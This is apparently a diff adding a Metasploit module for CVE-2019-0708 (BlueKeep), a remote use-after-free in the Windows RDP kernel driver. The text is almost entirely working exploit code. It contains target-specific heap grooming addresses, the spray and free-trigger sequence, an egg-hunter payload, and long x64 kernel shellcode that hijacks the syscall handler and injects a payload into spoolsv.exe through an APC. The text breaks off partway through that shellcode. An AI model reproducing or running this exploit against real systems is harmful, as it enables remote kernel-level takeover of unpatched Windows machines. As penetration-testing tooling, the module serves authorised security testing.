+  Rank = ManualRanking
+
+  USERMODE_EGG = 0xb00dac0fefe31337
+  KERNELMODE_EGG = 0xb00dac0fefe42069
+
+  CHUNK_SIZE = 0x400
+  HEADER_SIZE = 0x48
+
+  include Msf::Exploit::Remote::RDP
+  include Msf::Exploit::Remote::CheckScanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free',
+      'Description'    => %q(
+        The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,
+        allowing a malformed Disconnect Provider Indication message to cause use-after-free.
+        With a controllable data/size remote nonpaged pool spray, an indirect call gadget of
+        the freed channel is used to achieve arbitrary code execution.
+      ),
+      'Author' =>
+      [
+        'Sean Dillon <sean.dillon@risksense.com>',  # @zerosum0x0 - Original exploit
+        'Ryan Hanson',                              # @ryHanson - Original exploit
+        'OJ Reeves <oj@beyondbinary.io>',           # @TheColonial - Metasploit module
+        'Brent Cook <bcook@rapid7.com>',            # @busterbcook - Assembly whisperer
+      ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2019-0708'],
+          ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+          'WfsDelay' => 5,
+          'RDP_CLIENT_NAME' => 'ethdev',
+          'CheckScanner' => 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep'
+        },
+      'Privileged' => true,
+      'Payload' =>
+        {
+          'Space' => CHUNK_SIZE - HEADER_SIZE,
+          'EncoderType' => Msf::Encoder::Type::Raw,
+        },
+      'Platform' => 'win',
+      'Targets' =>
+        [
+          [
+            'Automatic targeting via fingerprinting',
+            {
+              'Arch' => [ARCH_X64],
+              'FingerprintOnly' => true
+            },
+          ],
+          #
+          #
+          # Windows 2008 R2 requires the following registry change from default:
+          #
+          # [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd]
+          # "fDisableCam"=dword:00000000
+          #
+          [
+            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64)',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64],
+              'GROOMBASE' => 0xfffffa8003800000,
+              'GROOMSIZE' => 100
+            }
+          ],
+          [
+            # This works with Virtualbox 6
+            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64],
+              'GROOMBASE' => 0xfffffa8002407000
+            }
+          ],
+          [
+            # This address works on VMWare 14
+            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64],
+              'GROOMBASE' => 0xfffffa8030c00000
+            }
+          ],
+          [
+            # This address works on VMWare 15
+            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64],
+              'GROOMBASE' => 0xfffffa8018C00000
+            }
+          ],
+          [
+            # This address works on VMWare 15.1
+            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64],
+              'GROOMBASE' => 0xfffffa8018c08000
+            }
+          ],
+          [
+            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64],
+              'GROOMBASE' => 0xfffffa8102407000
+            }
+          ],
+          [
+            'Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64],
+              'GROOMBASE' => 0xfffffa8018c08000
+            }
+          ],
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'May 14 2019',
+      'Notes' =>
+        {
+          'AKA' => ['Bluekeep']
+        }
+    ))
+
+    register_advanced_options(
+      [
+        OptBool.new('ForceExploit', [false, 'Override check result', false]),
+        OptInt.new('GROOMSIZE', [true, 'Size of the groom in MB', 250]),
+        OptEnum.new('GROOMCHANNEL', [true, 'Channel to use for grooming', 'RDPSND', ['RDPSND', 'MS_T120']]),
+        OptInt.new('GROOMCHANNELCOUNT', [true, 'Number of channels to groom', 1]),
+      ]
+    )
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable || datastore['ForceExploit']
+      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+    end
+
+    if target['FingerprintOnly']
+      fail_with(Msf::Module::Failure::BadConfig, 'Set the most appropriate target manually')
+    end
+
+    begin
+      rdp_connect
+    rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError
+      fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')
+    end
+
+    is_rdp, server_selected_proto = rdp_check_protocol
+    unless is_rdp
+      fail_with(Msf::Module::Failure::Unreachable, 'Unable to connect to RDP service')
+    end
+
+    # We don't currently support NLA in the mixin or the exploit. However, if we have valid creds, NLA shouldn't stop us
+    # from exploiting the target.
+    if [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include?(server_selected_proto)
+      fail_with(Msf::Module::Failure::BadConfig, 'Server requires NLA (CredSSP) security which mitigates this vulnerability.')
+    end
+
+    chans = [
+      ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP],
+      [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
+      [datastore['GROOMCHANNEL'], RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],
+      ['MS_XXX0', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
+      ['MS_XXX1', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
+      ['MS_XXX2', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
+      ['MS_XXX3', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
+      ['MS_XXX4', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
+      ['MS_XXX5', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
+      ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],
+    ]
+
+    @mst120_chan_id = 1004 + chans.length - 1
+
+    unless rdp_negotiate_security(chans, server_selected_proto)
+      fail_with(Msf::Module::Failure::Unknown, 'Negotiation of security failed.')
+    end
+
+    rdp_establish_session
+
+    rdp_dispatch_loop
+  end
+
+private
+
+  # This function is invoked when the PAKID_CORE_CLIENTID_CONFIRM message is
+  # received on a channel, and this is when we need to kick off our exploit.
+  def rdp_on_core_client_id_confirm(pkt, user, chan_id, flags, data)
+    # We have to do the default behaviour first.
+    super(pkt, user, chan_id, flags, data)
+
+    groom_size = datastore['GROOMSIZE']
+    pool_addr = target['GROOMBASE'] + (CHUNK_SIZE * 1024 * groom_size)
+    groom_chan_count = datastore['GROOMCHANNELCOUNT']
+
+    payloads = create_payloads(pool_addr)
+
+    print_status("Using CHUNK grooming strategy. Size #{groom_size}MB, target address 0x#{pool_addr.to_s(16)}, Channel count #{groom_chan_count}.")
+
+    target_channel_id = chan_id + 1
+
+    spray_buffer = create_exploit_channel_buffer(pool_addr)
+    spray_channel = rdp_create_channel_msg(self.rdp_user_id, target_channel_id, spray_buffer, 0, 0xFFFFFFF)
+    free_trigger = spray_channel * 20 + create_free_trigger(self.rdp_user_id, @mst120_chan_id) + spray_channel * 80
+
+    print_status("Surfing channels ...")
+    rdp_send(spray_channel * 1024)
+    rdp_send(free_trigger)
+
+    chan_surf_size = 0x421
+    spray_packets = (chan_surf_size / spray_channel.length) + [1, chan_surf_size % spray_channel.length].min
+    chan_surf_packet = spray_channel * spray_packets
+    chan_surf_count  = chan_surf_size / spray_packets
+
+    chan_surf_count.times do
+      rdp_send(chan_surf_packet)
+    end
+
+    print_status("Lobbing eggs ...")
+
+    groom_mb = groom_size * 1024 / payloads.length
+
+    groom_mb.times do
+      tpkts = ''
+      for c in 0..groom_chan_count
+        payloads.each do |p|
+          tpkts += rdp_create_channel_msg(self.rdp_user_id, target_channel_id + c, p, 0, 0xFFFFFFF)
+        end
+      end
+      rdp_send(tpkts)
+    end
+
+    # Terminating and disconnecting forces the USE
+    print_status("Forcing the USE of FREE'd object ...")
+    rdp_terminate
+    rdp_disconnect
+  end
+
+  # Helper function to create the kernel mode payload and the usermode payload with
+  # the egg hunter prefix.
+  def create_payloads(pool_address)
+    begin
+      [kernel_mode_payload, user_mode_payload].map { |p|
+        [
+          pool_address + HEADER_SIZE + 0x10, # indirect call gadget, over this pointer + egg
+          p
+        ].pack('<Qa*').ljust(CHUNK_SIZE - HEADER_SIZE, "\x00")
+      }
+    rescue => ex
+      print_error("#{ex.backtrace.join("\n")}: #{ex.message} (#{ex.class})")
+    end
+  end
+
+  def assemble_with_fixups(asm)
+    # Rewrite all instructions of form 'lea reg, [rel label]' as relative
+    # offsets for the instruction pointer, since metasm's 'ModRM' parser does
+    # not grok that syntax.
+    lea_rel = /lea+\s(?<dest>\w{2,3}),*\s\[rel+\s(?<label>[a-zA-Z_].*)\]/
+    asm.gsub!(lea_rel) do |match|
+      match = "lea #{$1}, [rip + #{$2}]"
+    end
+
+    # metasm encodes all rep instructions as repnz
+    # https://github.com/jjyg/metasm/pull/40
+    asm.gsub!(/rep+\smovsb/, 'db 0xf3, 0xa4')
+
+    encoded = Metasm::Shellcode.assemble(Metasm::X64.new, asm).encoded
+
+    # Fixup above rewritten instructions with the relative label offsets
+    encoded.reloc.each do |offset, reloc|
+      target = reloc.target.to_s
+      if encoded.export.key?(target)
+        # Note: this assumes the address we're fixing up is at the end of the
+        # instruction. This holds for 'lea' but if there are other fixups
+        # later, this might need to change to account for specific instruction
+        # encodings
+        if reloc.type == :i32
+          instr_offset = offset + 4
+        elsif reloc.type == :i16
+          instr_offset = offset + 2
+        end
+        encoded.fixup(target => encoded.export[target] - instr_offset)
+      else
+        raise "Unknown symbol '#{target}' while resolving relative offsets"
+      end
+    end
+    encoded.fill
+    encoded.data
+  end
+
+  # The user mode payload has two parts. The first is an egg hunter that searches for
+  # the kernel mode payload. The second part is the actual payload that's invoked in
+  # user land (ie. it's injected into spoolsrv.exe). We need to spray both the kernel
+  # and user mode payloads around the heap in different packets because we don't have
+  # enough space to put them both in the same chunk. Given that code exec can result in
+  # landing on the user land payload, the egg is used to go to a kernel payload.
+  def user_mode_payload
+
+    asm = %Q^
+_start:
+    lea rcx, [rel _start]
+    mov r8, 0x#{KERNELMODE_EGG.to_s(16)}
+_egg_loop:
+    sub rcx, 0x#{CHUNK_SIZE.to_s(16)}
+    sub rax, 0x#{CHUNK_SIZE.to_s(16)}
+    mov rdx, [rcx - 8]
+    cmp rdx, r8
+    jnz _egg_loop
+    jmp rcx
+    ^
+    egg_loop = assemble_with_fixups(asm)
+
+    # The USERMODE_EGG is required at the start as well, because the exploit code
+    # assumes the tag is there, and jumps over it to find the shellcode.
+    [
+      USERMODE_EGG,
+      egg_loop,
+      USERMODE_EGG,
+      payload.raw
+    ].pack('<Qa*<Qa*')
+  end
+
+  def kernel_mode_payload
+
+    # Windows x64 kernel shellcode from ring 0 to ring 3 by sleepya
+    #
+    # This shellcode was written originally for eternalblue exploits
+    # eternalblue_exploit7.py and eternalblue_exploit8.py
+    #
+    # Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)
+    #
+    # Note:
+    # - The userland shellcode is run in a new thread of system process.
+    #     If userland shellcode causes any exception, the system process get killed.
+    # - On idle target with multiple core processors, the hijacked system call
+    #     might take a while (> 5 minutes) to get called because the system
+    #     call may be called on other processors.
+    # - The shellcode does not allocate shadow stack if possible for minimal shellcode size.
+    #     This is ok because some Windows functions do not require a shadow stack.
+    # - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.
+    #     Note: the Windows 8 version macros are removed below
+    # - The userland payload MUST be appened to this shellcode.
+    #
+    # References:
+    # - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)
+    # - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c
+
+    data_kapc_offset           = 0x10
+    data_nt_kernel_addr_offset = 0x8
+    data_origin_syscall_offset = 0
+    data_peb_addr_offset       = -0x10
+    data_queueing_kapc_offset  = -0x8
+    hal_heap_storage           = 0xffffffffffd04100
+
+    # These hashes are not the same as the ones used by the
+    # Block API so they have to be hard-coded.
+    createthread_hash              = 0x835e515e
+    keinitializeapc_hash           = 0x6d195cc4
+    keinsertqueueapc_hash          = 0xafcc4634
+    psgetcurrentprocess_hash       = 0xdbf47c78
+    psgetprocessid_hash            = 0x170114e1
+    psgetprocessimagefilename_hash = 0x77645f3f
+    psgetprocesspeb_hash           = 0xb818b848
+    psgetthreadteb_hash            = 0xcef84c3e
+    spoolsv_exe_hash               = 0x3ee083d8
+    zwallocatevirtualmemory_hash   = 0x576e99ea
+
+    asm = %Q^
+shellcode_start:
+    nop
+    nop
+    nop
+    nop
+    ; IRQL is DISPATCH_LEVEL when got code execution
+
+    push rbp
+
+    call set_rbp_data_address_fn
+
+    ; read current syscall
+    mov ecx, 0xc0000082
+    rdmsr
+    ; do NOT replace saved original syscall address with hook syscall
+    lea r9, [rel syscall_hook]
+    cmp eax, r9d
+    je _setup_syscall_hook_done
+
+    ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize
+    cmp dword [rbp+#{data_origin_syscall_offset}], eax
+    je _hook_syscall
+
+    ; save original syscall
+    mov dword [rbp+#{data_origin_syscall_offset}+4], edx
+    mov dword [rbp+#{data_origin_syscall_offset}], eax
+
+    ; first time on the target
+    mov byte [rbp+#{data_queueing_kapc_offset}], 0
+
+_hook_syscall:
+    ; set a new syscall on running processor
+    ; setting MSR 0xc0000082 affects only running processor
+    xchg r9, rax
+    push rax
+    pop rdx     ; mov rdx, rax
+    shr rdx, 32
+    wrmsr
+
+_setup_syscall_hook_done:
+    pop rbp
+
+;--------------------- HACK crappy thread cleanup --------------------
+; This code is effectively the same as the epilogue of the function that calls
+; the vulnerable function in the kernel, with a tweak or two.
+
+    ; TODO: make the lock not suck!!
+    mov     rax, qword [gs:0x188]
+    add     word [rax+0x1C4], 1       ; KeGetCurrentThread()->KernelApcDisable++
+    lea     r11, [rsp+0b8h]
+    xor     eax, eax
+    mov     rbx, [r11+30h]
+    mov     rbp, [r11+40h]
+    mov     rsi, [r11+48h]
+    mov     rsp, r11
+    pop     r15
+    pop     r14
+    pop     r13
+    pop     r12
+    pop     rdi
+    ret
+
+;--------------------- END HACK crappy thread cleanup
+
+;========================================================================
+; Find memory address in HAL heap for using as data area
+; Return: rbp = data address
+;========================================================================
+set_rbp_data_address_fn:
+    ; On idle target without user application, syscall on hijacked processor might not be called immediately.
+    ; Find some address to store the data, the data in this address MUST not be modified
+    ;   when exploit is rerun before syscall is called
+    ;lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000]
+
+    ; ------ HACK rbp wasnt valid!
+
+    mov rbp, #{hal_heap_storage}    ; TODO: use some other buffer besides HAL heap??
+
+    ; --------- HACK end rbp
+
+_set_rbp_data_address_fn_next:
+    ;shr rbp, 12
+    ;shl rbp, 12
+    ;sub rbp, 0x70   ; for KAPC struct too
+    ret
+
+    ;int 3
+    ;call $+5
+    ;pop r13
+syscall_hook:
+    swapgs
+    mov qword [gs:0x10], rsp
+    mov rsp, qword [gs:0x1a8]
+    push 0x2b
+    push qword [gs:0x10]
+
+    push rax    ; want this stack space to store original syscall addr
+    ; save rax first to make this function continue to real syscall
+    push rax
+    push rbp    ; save rbp here because rbp is special register for accessing this shellcode data
+    call set_rbp_data_address_fn
+    mov rax, [rbp+#{data_origin_syscall_offset}]
+    add rax, 0x1f   ; adjust syscall entry, so we do not need to reverse start of syscall handler
+    mov [rsp+0x10], rax
+
+    ; save all volatile registers
+    push rcx
+    push rdx
+    push r8
+    push r9
+    push r10
+    push r11
+
+    ; use lock cmpxchg for queueing APC only one at a time
+    xor eax, eax
+    mov dl, 1
+    lock cmpxchg byte [rbp+#{data_queueing_kapc_offset}], dl
+    jnz _syscall_hook_done
+
+    ;======================================
+    ; restore syscall
+    ;======================================
+    ; an error after restoring syscall should never occur
+    mov ecx, 0xc0000082
+    mov eax, [rbp+#{data_origin_syscall_offset}]
+    mov edx, [rbp+#{data_origin_syscall_offset}+4]
+    wrmsr
+
+    ; allow interrupts while executing shellcode
+    sti
+    call r3_to_r0_start
+    cli
+
+_syscall_hook_done:
+    pop r11
+    pop r10
+    pop r9
+    pop r8
+    pop rdx
+    pop rcx
+    pop rbp
+    pop rax
+    ret
+
+r3_to_r0_start:
+    ; save used non-volatile registers
+    push r15
+    push r14
+    push rdi
+    push rsi
+    push rbx
+    push rax    ; align stack by 0x10
+
+    ;======================================
+    ; find nt kernel address
+    ;======================================
+    mov r15, qword [rbp+#{data_origin_syscall_offset}]      ; KiSystemCall64 is an address in nt kernel
+    shr r15, 0xc                ; strip to page size
+    shl r15, 0xc
+
+_x64_find_nt_walk_page:
+    sub r15, 0x1000             ; walk along page size
+    cmp word [r15], 0x5a4d      ; 'MZ' header
+    jne _x64_find_nt_walk_page
+
+    ; save nt address for using in KernelApcRoutine
+    mov [rbp+#{data_nt_kernel_addr_offset}], r15
+
+    ;======================================
+    ; get current EPROCESS and ETHREAD
+    ;======================================
+    mov r14, qword [gs:0x188]    ; get _ETHREAD pointer from KPCR
+    mov edi, #{psgetcurrentprocess_hash}
+    call win_api_direct
+    xchg rcx, rax       ; rcx = EPROCESS
+
+    ; r15 : nt kernel address
+    ; r14 : ETHREAD
+    ; rcx : EPROCESS
+
+    ;======================================
+    ; find offset of EPROCESS.ImageFilename
+    ;======================================
+    mov edi, #{psgetprocessimagefilename_hash}
+    call get_proc_addr
+    mov eax, dword [rax+3]  ; get offset from code (offset of ImageFilename is always > 0x7f)
+    mov ebx, eax        ; ebx = offset of EPROCESS.ImageFilename
+
+
+    ;======================================
+    ; find offset of EPROCESS.ThreadListHead
+    ;======================================
+    ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
+    ; if offset of ImageFilename is more than 0x400, current is (Win8+)
+
+    cmp eax, 0x400      ; eax is still an offset of EPROCESS.ImageFilename
+    jb _find_eprocess_threadlist_offset_win7
+    add eax, 0x10
+_find_eprocess_threadlist_offset_win7:
+    lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead
+
+    ;======================================
+    ; find offset of ETHREAD.ThreadListEntry
+    ;======================================
+
+    lea r8, [rcx+rdx]   ; r8 = address of EPROCESS.ThreadListHead
+    mov r9, r8
+
+    ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700
+_find_ethread_threadlist_offset_loop:
+    mov r9, qword [r9]
+
+    cmp r8, r9          ; check end of list
+    je _insert_queue_apc_done    ; not found !!!
+
+    ; if (r9 - r14 < 0x700) found
+    mov rax, r9
+    sub rax, r14
+    cmp rax, 0x700
+    ja _find_ethread_threadlist_offset_loop
+    sub r14, r9         ; r14 = -(offset of ETHREAD.ThreadListEntry)
+
+
+    ;======================================
+    ; find offset of EPROCESS.ActiveProcessLinks
+    ;======================================
+    mov edi, #{psgetprocessid_hash}
+    call get_proc_addr
+    mov edi, dword [rax+3]  ; get offset from code (offset of UniqueProcessId is always > 0x7f)
+    add edi, 8      ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)
+
+
+    ;======================================
+    ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock
+    ;======================================
+    ; check process name
+
+
+    xor eax, eax      ; HACK to exit earlier if process not found
+
+_find_target_process_loop:
+    lea rsi, [rcx+rbx]
+
+    push rax
+    call calc_hash
+    cmp eax, #{spoolsv_exe_hash}  ; "spoolsv.exe"
+    pop rax
+    jz found_target_process
+
+;---------- HACK PROCESS NOT FOUND start -----------
+    inc rax
+    cmp rax, 0x300      ; HACK not found!
+    jne _next_find_target_process
+    xor ecx, ecx
+    ; clear queueing kapc flag, allow other hijacked system call to run shellcode
+    mov byte [rbp+#{data_queueing_kapc_offset}], cl
+
+    jmp _r3_to_r0_done
+
+;---------- HACK PROCESS NOT FOUND end -----------
+
+_next_find_target_process:
+    ; next process
+    mov rcx, [rcx+rdi]
+    sub rcx, rdi
+    jmp _find_target_process_loop
+
+
+found_target_process:
+    ; The allocation for userland payload will be in KernelApcRoutine.
+    ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()
+
+    ;======================================
+    ; save process PEB for finding CreateThread address in kernel KAPC routine
+    ;======================================
+    mov edi, #{psgetprocesspeb_hash}
+    ; rcx is EPROCESS. no need to set it.
+    call win_api_direct
+    mov [rbp+#{data_peb_addr_offset}], rax
+
+
+    ;======================================
+    ; iterate ThreadList until KeInsertQueueApc() success
+    ;======================================
+    ; r15 = nt
+    ; r14 = -(offset of ETHREAD.ThreadListEntry)
+    ; rcx = EPROCESS
+    ; edx = offset of EPROCESS.ThreadListHead
+
+
+    lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
+    mov rbx, rsi    ; use rbx for iterating thread
+
+    ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
+    ; Moreover, alertable thread need to be waiting state which is more difficult to check.
+    ; try queueing APC then check KAPC member is more reliable.
+
+_insert_queue_apc_loop:
+    ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
+    mov rbx, [rbx+8]
+
+    cmp rsi, rbx
+    je _insert_queue_apc_loop   ; skip list head
+
+    ; find start of ETHREAD address
+    ; set it to rdx to be used for KeInitializeApc() argument too
+    lea rdx, [rbx + r14]    ; ETHREAD
+
+    ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.
+    ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.
+    ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.
+    ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.
+    ; Teb member is next to Queue member.
+    mov edi, #{psgetthreadteb_hash}
+    call get_proc_addr
+    mov eax, dword [rax+3]      ; get offset from code (offset of Teb is always > 0x7f)
+    cmp qword [rdx+rax-8], 0    ; KTHREAD.Queue MUST not be NULL
+    je _insert_queue_apc_loop
+
+    ; KeInitializeApc(PKAPC,
+    ;                 PKTHREAD,
+    ;                 KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
+    ;                 PKKERNEL_ROUTINE = kernel_apc_routine,
+    ;                 PKRUNDOWN_ROUTINE = NULL,
+    ;                 PKNORMAL_ROUTINE = userland_shellcode,
+    ;                 KPROCESSOR_MODE = UserMode (1),
+    ;                 PVOID Context);
+    lea rcx, [rbp+#{data_kapc_offset}]     ; PAKC
+    xor r8, r8      ; OriginalApcEnvironment
+    lea r9, [rel kernel_kapc_routine]    ; KernelApcRoutine
+    push rbp    ; context
+    push 1      ; UserMode
+    push rbp    ; userland shellcode (MUST NOT be NULL)
+    push r8     ; NULL
+    sub rsp, 0x20   ; shadow stack
+    mov edi, #{keinitializeapc_hash}
+    call win_api_direct
+    ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later
+
+    ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
+    ;   SystemArgument1 is second argument in usermode code (rdx)
+    ;   SystemArgument2 is third argument in usermode code (r8)
+    lea rcx, [rbp+#{data_kapc_offset}]
+    ;xor edx, edx   ; no need to set it here
+    ;xor r8, r8     ; no need to set it here
+    xor r9, r9
+    mov edi, #{keinsertqueueapc_hash}
+    call win_api_direct
+    add rsp, 0x40
+    ; if insertion failed, try next thread
+    test eax, eax
+    jz _insert_queue_apc_loop
+
+    mov rax, [rbp+#{data_kapc_offset}+0x10]     ; get KAPC.ApcListEntry
+    ; EPROCESS pointer 8 bytes
+    ; InProgressFlags 1 byte
+    ; KernelApcPending 1 byte
+    ; if success, UserApcPending MUST be 1
+    cmp byte [rax+0x1a], 1
+    je _insert_queue_apc_done
+
+    ; manual remove list without lock
+    mov [rax], rax
+    mov [rax+8], rax
+    jmp _insert_queue_apc_loop
+
+_insert_queue_apc_done:
+    ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.
+
+_r3_to_r0_done:
+    pop rax
+    pop rbx
+    pop rsi
+    pop rdi
+    pop r14
+    pop r15
+    ret
+
+;========================================================================
+; Call function in specific module
+;
+; All function arguments are passed as calling normal function with extra register arguments
+; Extra Arguments: r15 = module pointer
+;                  edi = hash of target function name
+;========================================================================
+win_api_direct:
+    call get_proc_addr
+    jmp rax
+
+
+;========================================================================
+; Get function address in specific module
+;
+; Arguments: r15 = module pointer
+;            edi = hash of target function name
+; Return: eax = offset
+;========================================================================
+get_proc_addr:
+    ; Save registers
+    push rbx
+    push rcx
+    push rsi                ; for using calc_hash
+
+    ; use rax to find EAT
+    mov eax, dword [r15+60]  ; Get PE header e_lfanew
+    mov eax, dword [r15+rax+136] ; Get export tables RVA
+
+    add rax, r15
+    push rax                 ; save EAT
+
+    mov ecx, dword [rax+24]  ; NumberOfFunctions
+    mov ebx, dword [rax+32]  ; FunctionNames
+    add rbx, r15
+
+_get_proc_addr_get_next_func:
+    ; When we reach the start of the EAT (we search backwards), we hang or crash
+    dec ecx                     ; decrement NumberOfFunctions
+    mov esi, dword [rbx+rcx*4]  ; Get rva of next module name
+    add rsi, r15                ; Add the modules base address
+
+    call calc_hash
+
+    cmp eax, edi                        ; Compare the hashes
+    jnz _get_proc_addr_get_next_func    ; try the next function
+
+_get_proc_addr_finish:
+    pop rax                     ; restore EAT
+    mov ebx, dword [rax+36]
+    add rbx, r15                ; ordinate table virtual address
+    mov cx, word [rbx+rcx*2]    ; desired functions ordinal
+    mov ebx, dword [rax+28]     ; Get the function addresses table rva
+    add rbx, r15                ; Add the modules base address
+    mov eax, dword [rbx+rcx*4]  ; Get the desired functions RVA
+    add rax, r15                ; Add the modules base address to get the functions actual VA
+
+    pop rsi
+    pop rcx
+    pop rbx
+    ret
+
+;========================================================================
+; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
+;
+; Argument: rsi = string to hash
+; Clobber: rsi
+; Return: eax = hash
+;========================================================================
+calc_hash:
+    push rdx
+    xor eax, eax
+    cdq
+_calc_hash_loop:
+    lodsb                   ; Read in the next byte of the ASCII string
+    ror edx, 13             ; Rotate right our hash value
+    add edx, eax            ; Add the next byte of the string
+    test eax, eax           ; Stop when found NULL
+    jne _calc_hash_loop
+    xchg edx, eax
+    pop rdx
+    ret
+
+
+; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
+; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
+; Moreover, there is no lock when calling KernelApcRoutine.
+; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.
+;
+; VOID KernelApcRoutine(
+;           IN PKAPC Apc,
+;           IN PKNORMAL_ROUTINE *NormalRoutine,
+;           IN PVOID *NormalContext,
+;           IN PVOID *SystemArgument1,
+;           IN PVOID *SystemArgument2)
+kernel_kapc_routine:
+    push rbp
+    push rbx
+    push rdi
+    push rsi
+    push r15
+
+    mov rbp, [r8]       ; *NormalContext is our data area pointer
+
+    mov r15, [rbp+#{data_nt_kernel_addr_offset}]
+    push rdx
+    pop rsi     ; mov rsi, rdx
+    mov rbx, r9
+
+    ;======================================
+    ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
+    ;======================================
+    xor eax, eax
+    mov cr8, rax    ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
+    ; rdx is already address of baseAddr
+    mov [rdx], rax      ; baseAddr = 0
+    mov ecx, eax
+    not rcx             ; ProcessHandle = -1
+    mov r8, rax         ; ZeroBits
+    mov al, 0x40    ; eax = 0x40
+    push rax            ; PAGE_EXECUTE_READWRITE = 0x40
+    shl eax, 6      ; eax = 0x40 << 6 = 0x1000
+    push rax            ; MEM_COMMIT = 0x1000
+    ; reuse r9 for address of RegionSize
+    mov [r9], rax       ; RegionSize = 0x1000
+    sub rsp, 0x20   ; shadow stack
+    mov edi, #{zwallocatevirtualmemory_hash}
+    call win_api_direct
+    add rsp, 0x30
+
+    ; check error
+    test eax, eax
+    jnz _kernel_kapc_routine_exit
+
+    ;======================================
+    ; copy userland payload
+    ;======================================
+    mov rdi, [rsi]
+
+;--------------------------- HACK IN EGG USER ---------
+
+    push rdi
+
+    lea rsi, [rel shellcode_start]
+    mov rdi, 0x#{USERMODE_EGG.to_s(16)}
+
+  _find_user_egg_loop:
